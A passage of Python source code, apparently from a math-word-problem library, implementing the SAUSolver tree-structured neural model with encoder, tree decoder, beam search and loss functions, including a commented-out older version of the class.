if idx in [self.out_sos_token, self.out_eos_token, self.out_pad_token]:
break
symbol = self.out_idx2symbol[idx]
if "NUM" in symbol:
num_idx = self.mask_list.index(symbol)
if num_idx >= num_len:
res = []
break
res.append(num_list[num_idx])
elif symbol == SpecialTokens.UNK_TOKEN:
try:
pos_list = num_stack.pop()
c = num_list[pos_list[0]]
res.append(c)
except:
return None
else:
res.append(symbol)
output_list.append(res)
return output_list
# class SAUSolver(nn.Module):
# """
# Reference:
# Qin et al. "Semantically-Aligned Universal Tree-Structured Solver for Math Word Problems" in EMNLP 2020.
# """
# def __init__(self, config, dataset):
# super(SAUSolver,self).__init__()
# #parameter
# self.hidden_size = config["hidden_size"]
# self.device = config["device"]
# self.USE_CUDA = True if self.device == torch.device('cuda') else False
# self.beam_size = config['beam_size']
# self.max_out_len = config['max_output_len']
# self.embedding_size = config["embedding_size"]
# self.dropout_ratio = config["dropout_ratio"]
# self.num_layers = config["num_layers"]
# self.rnn_cell_type = config["rnn_cell_type"]
# self.loss_weight = config['loss_weight']
#
# self.vocab_size = len(dataset.in_idx2word)
# self.out_symbol2idx = dataset.out_symbol2idx
# self.out_idx2symbol = dataset.out_idx2symbol
# generate_list = dataset.generate_list
# self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
# self.mask_list = NumMask.number
# self.num_start = dataset.num_start
# self.operator_nums = dataset.operator_nums
# self.generate_size = len(generate_list)
#
# self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
# try:
# self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
# except:
# self.out_sos_token = None
# try:
# self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
# except:
# self.out_eos_token = None
# try:
# self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
# except:
# self.out_pad_token = None
# #module
# self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
# #self.t_encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio)
# self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio, batch_first=False)
# self.decoder = SARTreeDecoder(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
# self.node_generater = GenerateNode(self.hidden_size, self.operator_nums, self.embedding_size, self.dropout_ratio)
# self.merge = Merge(self.hidden_size, self.embedding_size, self.dropout_ratio)
#
# self.loss1 = MaskedCrossEntropyLoss()
# #
# def calculate_loss(self, batch_data):
# """Finish forward-propagating, calculating loss and back-propagation.
#
# Args:
# batch_data (dict): one batch data.
#
# Returns:
# float: loss value.
# """
# seq = batch_data["question"]
# seq_length = batch_data["ques len"]
# nums_stack = batch_data["num stack"]
# num_size = batch_data["num size"]
# num_pos = batch_data["num pos"]
# target = batch_data["equation"]
# target_length = batch_data["equ len"]
# equ_mask = batch_data["equ mask"]
# num_list = batch_data['num list']
# generate_nums = self.generate_nums
# num_start = self.num_start
# # sequence mask for attention
# unk = self.unk_token
#
# loss = self.train_tree(seq,seq_length,target,target_length,\
# nums_stack,num_size,generate_nums,num_pos,unk,num_start)
# return loss
#
# def model_test(self, batch_data):
# """Model test.
#
# Args:
# batch_data (dict): one batch data.
#
# Returns:
# tuple(list,list): predicted equation, target equation.
# """
# seq = batch_data["question"]
# seq_length = batch_data["ques len"]
# nums_stack = batch_data["num stack"]
# num_size = batch_data["num size"]
# num_pos = batch_data["num pos"]
# target = batch_data["equation"]
# target_length = batch_data["equ len"]
# equ_mask = batch_data["equ mask"]
# num_list = batch_data['num list']
# generate_nums = self.generate_nums
# num_start = self.num_start
# # sequence mask for attention
# all_node_output = self.evaluate_tree(seq, seq_length, generate_nums, num_pos, num_start, self.beam_size, self.max_out_len)
#
# all_output = self.convert_idx2symbol(all_node_output, num_list[0], copy_list(nums_stack[0]))
# targets = self.convert_idx2symbol(target[0], num_list[0], copy_list(nums_stack[0]))
# return all_output, targets
#
# def train_tree(self, input_batch, input_length, target_batch, target_length, nums_stack_batch, num_size_batch, generate_nums, num_pos, unk, num_start, english=False):
# # sequence mask for attention
# seq_mask = []
# max_len = max(input_length)
# for i in input_length:
# seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
# seq_mask = torch.BoolTensor(seq_mask)
#
# num_mask = []
# max_num_size = max(num_size_batch) + len(generate_nums)
# for i in num_size_batch:
# d = i + len(generate_nums)
# num_mask.append([0] * d + [1] * (max_num_size - d))
# num_mask = torch.BoolTensor(num_mask)
#
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = input_batch.transpose(0, 1)
#
# target = target_batch.transpose(0, 1)
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
# batch_size = len(input_length)
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
#
# # Run words through encoder
# seq_emb = self.embedder(input_var)
# pade_outputs, _ = self.encoder(seq_emb, input_length)
# problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
# encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
# # Prepare input and output variables
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# max_target_length = max(target_length)
#
# all_node_outputs = []
# # all_leafs = []
# sub_tree_outputs = []
# sub_tree_target = []
# sub_tree_mask = []
#
# copy_num_len = [len(_) for _ in num_pos]
# num_size = max(copy_num_len)
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size, self.hidden_size)
#
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
# for t in range(max_target_length):
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden, seq_mask,
# num_mask)
#
# # all_leafs.append(p_leaf)
# outputs = torch.cat((op, num_score), 1)
# all_node_outputs.append(outputs)
#
# target_t, generate_input = self.generate_tree_input(target[t].tolist(), outputs, nums_stack_batch, num_start, unk)
# target[t] = target_t
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
# left_childs = []
# sub_tree_emb = []
# loss_mask = []
# for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1), node_stacks, target[t].tolist(), embeddings_stacks):
# if len(node_stack) != 0:
# node = node_stack.pop()
# else:
# left_childs.append(None)
# sub_tree_emb.append(padding_hidden)
# loss_mask.append(torch.zeros(1, dtype=torch.float))
# continue
#
# if i < num_start:
# node_stack.append(TreeNode(r))
# node_stack.append(TreeNode(l, left_flag=True))
# o.append(TreeEmbedding(node_label[idx].unsqueeze(0), False))
# else:
# current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
# while len(o) > 0 and o[-1].terminal:
# sub_stree = o.pop()
# op = o.pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# o.append(TreeEmbedding(current_num, True))
# if len(o) > 0 and o[-1].terminal:
# left_childs.append(o[-1].embedding)
# sub_tree_emb.append(o[-1].embedding)
# loss_mask.append(torch.ones(1, dtype=torch.float))
# else:
# left_childs.append(None)
# sub_tree_emb.append(padding_hidden)
# loss_mask.append(torch.zeros(1, dtype=torch.float))
#
# sub_tree_emb = torch.stack(sub_tree_emb)
# loss_mask = torch.stack(loss_mask)
# #score = self.decoder.attn(sub_tree_emb.transpose(0, 1), encoder_outputs, seq_mask)
# score = self.decoder.saligned_attn(sub_tree_emb.transpose(0, 1), encoder_outputs, seq_mask)
# s_aligned_vector = score.bmm(encoder_outputs.transpose(0, 1)) #vector a in paper
# s_aligned_a, s_aligned_d = self.decoder.Semantically_Aligned_Regularization(sub_tree_emb, s_aligned_vector)
# sub_tree_outputs.append(s_aligned_a)
# sub_tree_target.append(s_aligned_d)
# sub_tree_mask.append(loss_mask)
#
# # all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
# all_node_outputs = torch.stack(all_node_outputs, dim=1) # B x S x N
# sub_tree_outputs = torch.cat(sub_tree_outputs, dim=1)
# sub_tree_target = torch.cat(sub_tree_target, dim=1)
# sub_tree_mask = torch.cat(sub_tree_mask, dim=1)
#
# target = target.transpose(0, 1).contiguous()
# if self.USE_CUDA:
# # all_leafs = all_leafs.cuda()
# all_node_outputs = all_node_outputs.cuda()
# target = target.cuda()
# target_length = torch.LongTensor(target_length).cuda()
# else:
# target_length = torch.LongTensor(target_length)
#
# # op_target = target < num_start
# # loss_0 = masked_cross_entropy_without_logit(all_leafs, op_target.long(), target_length)
# loss_1 = masked_cross_entropy(all_node_outputs, target, target_length)
# loss_2 = self.mse_loss(sub_tree_outputs, sub_tree_target, sub_tree_mask)
# #self.loss2.eval_batch(sub_tree_outputs, sub_tree_target)
# loss = loss_1 + self.loss_weight * loss_2
# loss.backward()
# return loss.item()
#
# def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30):
#
# seq_mask = torch.BoolTensor(1, input_length).fill_(0)
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = input_batch.transpose(0, 1)
#
# num_mask = torch.BoolTensor(1, len(num_pos[0]) + len(generate_nums)).fill_(0)
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
#
# batch_size = 1
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
# # Run words through encoder
#
# seq_emb = self.embedder(input_var)
# pade_outputs, _ = self.encoder(seq_emb, input_length)
# problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
# encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#
# # Prepare input and output variables
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# num_size = len(num_pos[0])
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size, self.hidden_size)
# # B x P x N
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
#
# beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
#
# for t in range(max_length):
# current_beams = []
# while len(beams) > 0:
# b = beams.pop()
# if len(b.node_stack[0]) == 0:
# current_beams.append(b)
# continue
# # left_childs = torch.stack(b.left_childs)
# left_childs = b.left_childs
#
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
#
# # out_score = p_leaf * out_score
#
# topv, topi = out_score.topk(beam_size)
#
# for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
# current_node_stack = copy_list(b.node_stack)
# current_left_childs = []
# current_embeddings_stacks = copy_list(b.embedding_stack)
# current_out = copy.deepcopy(b.out)
#
# out_token = int(ti)
# current_out.append(out_token)
#
# node = current_node_stack[0].pop()
#
# if out_token < num_start:
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
#
# current_node_stack[0].append(TreeNode(right_child))
# current_node_stack[0].append(TreeNode(left_child, left_flag=True))
#
# current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
# else:
# current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
#
# while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# sub_stree = current_embeddings_stacks[0].pop()
# op = current_embeddings_stacks[0].pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
# if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
# else:
# current_left_childs.append(None)
# current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks, current_left_childs, current_out))
# beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
# beams = beams[:beam_size]
# flag = True
# for b in beams:
# if len(b.node_stack[0]) != 0:
# flag = False
# if flag:
# break
#
# return beams[0].out
#
# def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, batch_size, num_size, hidden_size):
# indices = list()
# sen_len = encoder_outputs.size(0)
# masked_index = []
# temp_1 = [1 for _ in range(hidden_size)]
# temp_0 = [0 for _ in range(hidden_size)]
# for b in range(batch_size):
# for i in num_pos[b]:
# indices.append(i + b * sen_len)
# masked_index.append(temp_0)
# indices += [0 for _ in range(len(num_pos[b]), num_size)]
# masked_index += [temp_1 for _ in range(len(num_pos[b]), num_size)]
# indices = torch.LongTensor(indices)
# masked_index = torch.BoolTensor(masked_index)
# masked_index = masked_index.view(batch_size, num_size, hidden_size)
# if self.USE_CUDA:
# indices = indices.cuda()
# masked_index = masked_index.cuda()
# all_outputs = encoder_outputs.transpose(0, 1).contiguous()
# all_embedding = all_outputs.view(-1, encoder_outputs.size(2)) # S x B x H -> (B x S) x H
# all_num = all_embedding.index_select(0, indices)
# all_num = all_num.view(batch_size, num_size, hidden_size)
# return all_num.masked_fill_(masked_index, 0.0)
#
# def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
# # when the decoder input is copied num but the num has two pos, chose the max
# target_input = copy.deepcopy(target)
# for i in range(len(target)):
# if target[i] == unk:
# num_stack = nums_stack_batch[i].pop()
# max_score = -float("1e12")
# for num in num_stack:
# if decoder_output[i, num_start + num] > max_score:
# target[i] = num + num_start
# max_score = decoder_output[i, num_start + num]
# if target_input[i] >= num_start:
# target_input[i] = 0
# return torch.LongTensor(target), torch.LongTensor(target_input)
#
# def mse_loss(self, outputs, targets, mask=None):
# # outputs : [batch_size,output_len,hidden_size]
# # targets : [batch_size,output_len,hidden_size]
# # mask : [batch_size,output_len]
# mask = mask.to(self.device)
# x = torch.sqrt(torch.sum(torch.square((outputs - targets)), dim=-1)) # [batch_size,output_len]
# y = torch.sum(x * mask, dim=-1) / torch.sum(mask, dim=-1) # [batch_size]
# return torch.sum(y)
#
# def convert_idx2symbol(self, output, num_list, num_stack):
# #batch_size=output.size(0)
# '''batch_size=1'''
# seq_len = len(output)
# num_len = len(num_list)
# output_list = []
# res = []
# for s_i in range(seq_len):
# idx = output[s_i]
# if idx in [self.out_sos_token, self.out_eos_token, self.out_pad_token]:
# break
# symbol = self.out_idx2symbol[idx]
# if "NUM" in symbol:
# num_idx = self.mask_list.index(symbol)
# if num_idx >= num_len:
# res = []
# break
# res.append(num_list[num_idx])
# elif symbol == SpecialTokens.UNK_TOKEN:
# try:
# pos_list = num_stack.pop()
# c = num_list[pos_list[0]]
# res.append(c)
# except:
# return None
# else:
# res.append(symbol)
# output_list.append(res)
# return output_list
class SAUSolver_(nn.Module):
def __init__(self, config, dataset):
super().__init__()
#parameter
self.hidden_size = config["hidden_size"]
self.device = config["device"]
self.beam_size = config['beam_size']
self.max_out_len = config['max_output_len']
self.embedding_size = config["embedding_size"]
self.dropout_ratio = config["dropout_ratio"]
self.num_layers = config["num_layers"]
self.rnn_cell_type = config["rnn_cell_type"]
self.loss_weight = config['loss_weight']
self.vocab_size = len(dataset.in_idx2word)
self.out_symbol2idx = dataset.out_symbol2idx
self.out_idx2symbol = dataset.out_idx2symbol
generate_list = dataset.generate_list
self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
self.mask_list = NumMask.number
self.num_start = dataset.num_start
self.operator_nums = dataset.operator_nums
self.generate_size = len(generate_list)
self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
try:
self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
except:
self.out_sos_token = None
try:
self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
except:
self.out_eos_token = None
try:
self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
except:
self.out_pad_token = None
#module
self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio)
self.decoder = SARTreeDecoder(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
self.node_generater = NodeGenerater(self.hidden_size, self.operator_nums, self.embedding_size, self.dropout_ratio)
self.merge = SubTreeMerger(self.hidden_size, self.embedding_size, self.dropout_ratio)
self.loss1 = MaskedCrossEntropyLoss()
#
def forward(self,seq, seq_length, nums_stack, num_size, generate_nums, num_pos,\
num_start,target=None, target_length=None,max_length=30,beam_size=5,UNK_TOKEN=None):
# sequence mask for attention
beam_size = self.beam_size
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
if target != None:
all_node_outputs, target=self.generate_node(encoder_outputs,problem_output,target,target_length,\
num_pos,nums_stack,padding_hidden,seq_mask,num_mask,UNK_TOKEN,num_start)
else:
all_node_outputs = self.generate_node_(encoder_outputs, problem_output, padding_hidden, seq_mask, num_mask, num_pos, num_start, beam_size, max_length)
return all_node_outputs
# all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
all_node_outputs = torch.stack(all_node_outputs, dim=1).to(self.device) # B x S x N
return all_node_outputs, target
def calculate_loss(self, batch_data):
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
target_length = batch_data["equ len"]
equ_mask = batch_data["equ mask"]
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
beam_size = self.beam_size
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
UNK_TOKEN = self.unk_token
all_node_outputs, sub_tree_outputs,sub_tree_target,sub_tree_mask=self.generate_node(encoder_outputs,problem_output,target,target_length,\
num_pos,nums_stack,padding_hidden,seq_mask,num_mask,UNK_TOKEN,num_start)
all_node_outputs = torch.stack(all_node_outputs, dim=1).to(self.device)
sub_tree_outputs = torch.cat(sub_tree_outputs, dim=1)
sub_tree_target = torch.cat(sub_tree_target, dim=1)
sub_tree_mask = torch.cat(sub_tree_mask, dim=1)
#sub_tree_outputs = sub_tree_outputs.view(-1,sub_tree_outputs.size(-1))
#sub_tree_target = sub_tree_target.view(-1,sub_tree_target.size(-1))
self.loss1.reset()
#self.loss2.reset()
self.loss1.eval_batch(all_node_outputs, target, equ_mask)
loss_2 = self.mse_loss(sub_tree_outputs, sub_tree_target, sub_tree_mask)
#self.loss2.eval_batch(sub_tree_outputs, sub_tree_target)
loss = self.loss1.acc_loss + self.loss_weight * loss_2
loss.backward()
return loss.item()
def model_test(self, batch_data):
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
num_list = batch_data['num list']
#target_length=batch_data["equ len"]
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
beam_size = self.beam_size
max_length = self.max_out_len
seq_mask = []
max_len = max(seq_length)
for i in seq_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.BoolTensor(seq_mask).to(self.device)
num_mask = []
max_num_size = max(num_size) + len(generate_nums)
for i in num_size:
d = i + len(generate_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.BoolTensor(num_mask).to(self.device)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0).to(self.device)
batch_size = len(seq_length)
seq_emb = self.embedder(seq)
pade_outputs, _ = self.encoder(seq_emb, seq_length)
problem_output = pade_outputs[:, -1, :self.hidden_size] + pade_outputs[:, 0, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
#print("encoder_outputs", encoder_outputs.size())
#print("problem_output", problem_output.size())
all_node_outputs = self.generate_node_(encoder_outputs, problem_output, padding_hidden, seq_mask, num_mask, num_pos, num_start, beam_size, max_length)
all_outputs = self.convert_idx2symbol(all_node_outputs, num_list[0], copy_list(nums_stack[0]))
targets = self.convert_idx2symbol(target[0], num_list[0], copy_list(nums_stack[0]))
return all_outputs, targets
def generate_node(self,encoder_outputs,problem_output,target,target_length,\
num_pos,nums_stack,padding_hidden,seq_mask,num_mask,unk,num_start):
batch_size = encoder_outputs.size(0)
# Prepare input and output variables
node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
max_target_length = max(target_length)
all_node_outputs = []
sub_tree_outputs = []
sub_tree_target = []
sub_tree_mask = []
# all_leafs = []
copy_num_len = [len(_) for _ in num_pos]
num_size = max(copy_num_len)
all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, num_size, self.hidden_size)
#print("all_nums_encoder_outputs", all_nums_encoder_outputs.size())
left_childs = [None for _ in range(batch_size)] #
embeddings_stacks = [[] for _ in range(batch_size)] #
for t in range(max_target_length):
num_score, op, current_embeddings, current_context, current_nums_embeddings = \
self.decoder(node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, \
padding_hidden, seq_mask, num_mask)
# all_leafs.append(p_leaf)
outputs = torch.cat((op, num_score), 1)
all_node_outputs.append(outputs)
target_t, generate_input = self.generate_tree_input_(target[:, t].tolist(), outputs, nums_stack, num_start, unk)
target[:, t] = target_t
generate_input = generate_input.to(self.device)
left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
#print("left_child", left_child.size())
#print("right_child", right_child.size())
#print("node_label", node_label.size())
left_childs = []
#print("target", target.size())
#print("target[:,t]", target[:,t].size())
sub_tree_emb = []
loss_mask = []
for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1), node_stacks, target[:, t].tolist(), embeddings_stacks):
if len(node_stack) != 0:
node = node_stack.pop()
else:
left_childs.append(None)
sub_tree_emb.append(padding_hidden)
loss_mask.append(torch.zeros(1, dtype=torch.float))
continue
if i < num_start:
node_stack.append(TreeNode(r))
node_stack.append(TreeNode(l, left_flag=True))
o.append(TreeEmbedding(node_label[idx].unsqueeze(0), False))
else:
try:
current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
except:
print('current_num_emb:', current_nums_embeddings.size(), 'num start:', self.num_start, 'token idx:', i)
print('out list:', self.out_idx2symbol, 'out gen:', self.generate_size)
print('batch i:', i)
raise ValueError
while len(o) > 0 and o[-1].terminal:
sub_stree = o.pop()
op = o.pop()
current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
o.append(TreeEmbedding(current_num, True))
if len(o) > 0 and o[-1].terminal:
left_childs.append(o[-1].embedding)
sub_tree_emb.append(o[-1].embedding)
loss_mask.append(torch.ones(1, dtype=torch.float))
else:
left_childs.append(None)
sub_tree_emb.append(padding_hidden)
loss_mask.append(torch.zeros(1, dtype=torch.float))
#
sub_tree_emb = torch.stack(sub_tree_emb)
loss_mask = torch.stack(loss_mask)
score = self.decoder.attn(sub_tree_emb, encoder_outputs, seq_mask)
s_aligned_vector = score.bmm(encoder_outputs)
s_aligned_a, s_aligned_d = self.decoder.Semantically_Aligned_Regularization(sub_tree_emb, s_aligned_vector)
sub_tree_outputs.append(s_aligned_a)
sub_tree_target.append(s_aligned_d)
sub_tree_mask.append(loss_mask)
return all_node_outputs, sub_tree_outputs, sub_tree_target, sub_tree_mask
def generate_node_(self,encoder_outputs,problem_output,padding_hidden,seq_mask,num_mask,num_pos,\
num_start,beam_size,max_length):
batch_size = encoder_outputs.size(0)
# Prepare input and output variables
node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
num_size = len(num_pos[0])
all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, num_size, self.encoder.hidden_size)
embeddings_stacks = [[] for _ in range(batch_size)]
left_childs = [None for _ in range(batch_size)]
beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
for t in range(max_length):
current_beams = []
while len(beams) > 0:
b = beams.pop()
if len(b.node_stack[0]) == 0:
current_beams.append(b)
continue
# left_childs = torch.stack(b.left_childs)
left_childs = b.left_childs
num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
seq_mask, num_mask)
out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
# out_score = p_leaf * out_score
topv, topi = out_score.topk(beam_size)
for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
current_node_stack = self.copy_list(b.node_stack)
current_left_childs = []
current_embeddings_stacks = self.copy_list(b.embedding_stack)
current_out = copy.deepcopy(b.out)
out_token = int(ti)
current_out.append(out_token)
node = current_node_stack[0].pop()
if out_token < num_start:
generate_input = torch.LongTensor([out_token]).to(self.device)
left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
current_node_stack[0].append(TreeNode(right_child))
current_node_stack[0].append(TreeNode(left_child, left_flag=True))
current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
else:
try:
current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
except:
print('current_num_emb:', current_nums_embeddings.size(), 'num start:', self.num_start, 'token idx:', out_token)
print('operator:', op.size(), 'num:', num_score.size(), 'out:', out_score.size())
raise ValueError
while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
sub_stree = current_embeddings_stacks[0].pop()
op = current_embeddings_stacks[0].pop()
current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
else:
current_left_childs.append(None)
current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks, current_left_childs, current_out))
beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
beams = beams[:beam_size]
flag = True
for b in beams:
if len(b.node_stack[0]) != 0:
flag = False
if flag:
break
return beams[0].out
def mse_loss(self, outputs, targets, mask=None):
# outputs : [batch_size,output_len,hidden_size]
# targets : [batch_size,output_len,hidden_size]
# mask : [batch_size,output_len]
mask = mask.to(self.device)
x = torch.sqrt(torch.sum(torch.square((outputs - targets)), dim=-1)) # [batch_size,output_len]
y = torch.sum(x * mask, dim=-1) / torch.sum(mask, dim=-1) # [batch_size]
return torch.sum(y)
def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, num_size, hidden_size):
indices = list()
sen_len = encoder_outputs.size(1)
batch_size = encoder_outputs.size(0)
masked_index = []
temp_1 = [1 for _ in range(hidden_size)]
temp_0 = [0 for _ in range(hidden_size)]
for b in range(batch_size):
for i in num_pos[b]:
if i == -1:
indices.append(0)
masked_index.append(temp_1)
continue
indices.append(i + b * sen_len)
masked_index.append(temp_0)
indices += [0 for _ in range(len(num_pos[b]), num_size)]
masked_index += [temp_1 for _ in range(len(num_pos[b]), num_size)]
indices = torch.LongTensor(indices).to(self.device)
masked_index = torch.BoolTensor(masked_index).to(self.device)
masked_index = masked_index.view(batch_size, num_size, hidden_size)
all_outputs = encoder_outputs.contiguous()
all_embedding = all_outputs.view(-1, encoder_outputs.size(2)) # S x B x H -> (B x S) x H
all_num = all_embedding.index_select(0, indices)
all_num = all_num.view(batch_size, num_size, hidden_size)
return all_num.masked_fill_(masked_index, 0.0)
def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
target_input = copy.deepcopy(target)
